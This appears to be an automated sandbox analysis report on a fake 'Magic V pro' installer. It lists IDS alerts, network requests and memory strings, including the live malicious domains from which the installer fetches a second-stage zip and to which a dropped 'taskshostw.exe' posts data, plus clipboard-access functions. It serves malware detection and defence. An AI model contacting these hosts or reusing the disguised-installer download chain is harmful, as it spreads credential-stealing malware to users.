              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.194.165:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 172.67.194.165:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 172.67.194.165:443
              Source: global trafficHTTP traffic detected: GET /y7yju2tp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: tinyurl.com
              Source: global trafficHTTP traffic detected: GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: rentry.org
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /y7yju2tp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: tinyurl.com
              Source: global trafficHTTP traffic detected: GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: rentry.org
              Source: global trafficHTTP traffic detected: GET /willrandom.zip HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: rea.grupolalegion.ecConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: tinyurl.com
              Source: global trafficDNS traffic detected: DNS query: rentry.org
              Source: global trafficDNS traffic detected: DNS query: rea.grupolalegion.ec
              Source: global trafficDNS traffic detected: DNS query: willpowerwav.site
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Mar 2025 02:14:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJDNiZqPAS9JO10fMDiJ1YvHzS%2BxpmNuK5YO%2BsqbQPiKtTI%2Fgaci1NimzvulzcPDdkPxBFTeqjFJPKWJgz1auCndpQ2opPw8akM4i96k%2Bk0MJLD0pzxdtJ4m2gFvy3%2FDjsjGaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ced241b80f9035-BOS
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Mar 2025 02:15:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 91ced38809a78f8d-BOS
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1236181676.000000007F3D0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/innosetup/index.htm
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.drString found in binary or memory: http://bitbucket.org/mitrich_k/inno-download-plugin
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1237949116.000000007F4C0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.drString found in binary or memory: http://mitrichsoftware.wordpress.comB
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.0000000002482000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.coa7H
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drString found in binary or memory: http://www.freepdfeditor.net
              Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drString found in binary or memory: http://www.freepdfeditor.netj
              Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drString found in binary or memory: http://www.freepdfeditor.netopenU
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drString found in binary or memory: http://www.innosetup.com/
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002241000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kymoto.org0
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1187273002.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1192524909.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.0000000002489000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kymoto.orgAbout
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.000000000246D000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.000000000240D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kymoto.orgq
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co(
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drString found in binary or memory: http://www.remobjects.com/ps
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/R
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1421929567.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/willrandom.zip
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipU
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1417406355.0000000003F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipWW
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipq
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tinyurl.com/
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tinyurl.com/1
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tinyurl.com/l
              Source: taskshostw.exe, 00000011.00000002.1517647139.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.000000000070A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.0000000000710000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/
              Source: taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/:
              Source: taskshostw.exe, 00000016.00000003.2019868052.0000000000824000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/Y
              Source: taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000876000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/api
              Source: taskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/apiF
              Source: taskshostw.exe, 00000011.00000003.1514392072.000000000075E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site/apix
              Source: taskshostw.exe, 00000016.00000003.2037241269.000000000083C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039954771.0000000000840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://willpowerwav.site:443/api
              Source: taskshostw.exe, 00000011.00000003.1514392072.0000000000702000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497071497.0000000000786000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019868052.000000000081E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000784000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000783000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.000000000088B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: https://www.globalsign.com/repository/0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,17_2_0043AF10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,17_2_0043AF10

              System Summary

              barindex
              Source: logs.4.drZip Entry: encrypted
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF8752: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,10_2_00FF8752
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_3_00927D934_3_00927D93
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpCode function: 4_3_0092DF714_3_0092DF71
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0105CD3B10_2_0105CD3B
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01056D5610_2_01056D56
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106ADF010_2_0106ADF0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108811010_2_01088110
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108417010_2_01084170
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107402010_2_01074020
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107427010_2_01074270
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010602BA10_2_010602BA
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010802C010_2_010802C0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0104C50E10_2_0104C50E
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106C53010_2_0106C530
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0100C5E610_2_0100C5E6
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0100C41710_2_0100C417
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108C41010_2_0108C410
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106863010_2_01068630
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107466010_2_01074660
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0109491010_2_01094910
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107893010_2_01078930
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107883010_2_01078830
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01090B9010_2_01090B90
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01098BE010_2_01098BE0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01098A2010_2_01098A20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01094AE910_2_01094AE9
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01038C0310_2_01038C03
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01090FB010_2_01090FB0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106D01010_2_0106D010
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107131010_2_01071310
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106937010_2_01069370
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF159810_2_00FF1598
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0104577510_2_01045775
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107969010_2_01079690
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010656A010_2_010656A0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF5A8810_2_00FF5A88
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF1A6710_2_00FF1A67
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01071A2010_2_01071A20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01039A5D10_2_01039A5D
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01079A8010_2_01079A80
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF9C0010_2_00FF9C00
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01091CF010_2_01091CF0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01081FC010_2_01081FC0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01089E2010_2_01089E20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01049E8910_2_01049E89
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0100A11A10_2_0100A11A
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108615010_2_01086150
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106618010_2_01066180
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108204010_2_01082040
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010720F010_2_010720F0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0104237F10_2_0104237F
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108A3E010_2_0108A3E0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106A59010_2_0106A590
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107A4A010_2_0107A4A0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107A75010_2_0107A750
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0109290010_2_01092900
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0100E99110_2_0100E991
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106E86010_2_0106E860
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107A8B010_2_0107A8B0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01052B0010_2_01052B00
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01092AB010_2_01092AB0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0103ECF610_2_0103ECF6
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108AF2010_2_0108AF20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107AE2010_2_0107AE20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0109302010_2_01093020
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0106F0D010_2_0106F0D0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010830E810_2_010830E8
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0104B27210_2_0104B272
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108B49010_2_0108B490
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0108F64010_2_0108F640
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010978C010_2_010978C0
